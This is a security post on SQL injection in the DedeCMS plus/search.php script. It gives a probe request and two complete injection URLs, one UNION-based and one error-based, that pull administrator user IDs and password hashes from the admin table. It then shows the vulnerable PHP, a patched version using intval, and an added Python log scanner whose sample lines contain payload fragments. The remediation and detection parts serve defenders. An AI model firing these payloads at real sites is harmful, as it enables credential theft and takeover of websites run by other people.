dedecms plus/search.php injection vulnerability: how it is exploited and how to fix it
Applies to older versions; tested on dede 5.7.
Submit:
```
mumaasp.com/plus/search.php?keyword=as&typeArr[1 uNion 1]=a
```
If the response says
```
Safe Alert: Request Error step 2 !
```
then use the following exp directly:
```
mumaasp.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
```
If the response says
```
Safe Alert: Request Error step 1 !
```
then use the following exp directly:
```
mumaasp.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
```
If the page renders normally, the vulnerability no longer exists.
Vulnerable file: /plus/search.php
```php
// Excerpt from plus/search.php (vulnerable version).
// Load the category-name cache and check whether the keyword matches any category name
require_once($typenameCacheFile);
if (isset($typeArr) && is_array($typeArr))
{
    foreach ($typeArr as $id => $typename)
    {
        $keywordn = str_replace($typename, ' ', $keyword);
        if ($keyword != $keywordn)
        {
            $keyword = $keywordn;
            $typeid  = $id;   // $id (the user-supplied array key) is used without any filtering, which allows injection
            break;
        }
    }
}
$keyword = addslashes(cn_substr($keyword, 30));
```
After the fix:
```php
// Excerpt from plus/search.php (fixed version).
// Load the category-name cache and check whether the keyword matches any category name
require_once($typenameCacheFile);
if (isset($typeArr) && is_array($typeArr))
{
    foreach ($typeArr as $id => $typename)
    {
        //$keywordn = str_replace($typename, ' ', $keyword);
        $keywordn = $keyword;
        if ($keyword != $keywordn)
        {
            $keyword = HtmlReplace($keywordn);   // guard against XSS
            $typeid  = intval($id);              // force the id to an integer
            break;
        }
    }
}
$keyword = addslashes(cn_substr($keyword, 30));
```
Note that with `$keywordn = $keyword` the comparison that follows can never be true, so that branch is dead code and category matching by keyword is effectively switched off. The line that actually closes the injection is `$typeid = intval($id)`: whatever string an attacker places inside the `typeArr[...]` key, only a plain integer reaches the query.
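As a defender-side complement to the code fix above, the following added example (not part of the original post and not DedeCMS code) scans web-server access logs for requests to `/plus/search.php` whose `typeArr[...]` key is anything other than a plain decimal integer, which is exactly the input the vulnerable version copied into `$typeid` unfiltered. The log lines in `SAMPLE_LOG` are constructed for the example; the Common Log Format layout, the path name and the helper function names are assumptions, not anything defined on the page.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (not taken from the original post). Lines 2 and 3
# carry typeArr[] keys shaped like the payloads above; line 1 is a legitimate search.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Jan/2013:22:59:31 +0800] "GET /plus/search.php?keyword=test&typeArr[3]=news HTTP/1.1" 200 5120
10.0.0.8 - - [19/Jan/2013:23:01:02 +0800] "GET /plus/search.php?keyword=as&typeArr[1%20uNion%201]=a HTTP/1.1" 200 312
10.0.0.9 - - [19/Jan/2013:23:03:36 +0800] "GET /plus/search.php?keyword=as&typeArr[111%3D@`\\'`)+UnIon+seleCt+1]=a HTTP/1.1" 200 312
10.0.0.5 - - [19/Jan/2013:23:05:00 +0800] "GET /index.php HTTP/1.1" 200 8000
"""

# Common/combined log format (assumed): client IP first, then the quoted request line.
REQUEST_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"'
)
# A typeArr[...] query key; the bracket content is what PHP uses as the array index,
# and what the vulnerable code assigned straight to $typeid.
TYPEARR_KEY = re.compile(r"^typeArr\[(?P<id>.*)\]$", re.S)
DECIMAL = re.compile(r"[0-9]+")


def suspicious_type_ids(query: str) -> list[str]:
    """Return the typeArr[] indices in a query string that are not plain decimal integers.

    parse_qsl percent-decodes keys and turns '+' into spaces, so the check sees the
    same index value PHP would place in $typeArr.
    """
    bad = []
    for key, _value in parse_qsl(query, keep_blank_values=True):
        m = TYPEARR_KEY.match(key)
        if m and not DECIMAL.fullmatch(m.group("id")):
            bad.append(m.group("id"))
    return bad


def scan_log(log_text: str) -> list[tuple[str, str]]:
    """Scan access-log text for /plus/search.php requests carrying a non-numeric typeArr index.

    Returns (client_ip, offending_index) pairs in log order.
    """
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("path"))
        if parts.path != "/plus/search.php":
            continue
        for bad_id in suspicious_type_ids(parts.query):
            hits.append((m.group("ip"), bad_id))
    return hits


if __name__ == "__main__":
    for ip, bad_id in scan_log(SAMPLE_LOG):
        print(f"{ip}: non-numeric typeArr index {bad_id!r}")
```

The check mirrors the fix rather than matching SQL keywords: after `intval($id)` only a decimal integer is meaningful as a category id, so any other bracket content is noise at best and probing at worst, regardless of how the keywords inside it are cased or encoded. Running the scan over the constructed log flags the requests from 10.0.0.8 and 10.0.0.9 and leaves the legitimate `typeArr[3]` search alone.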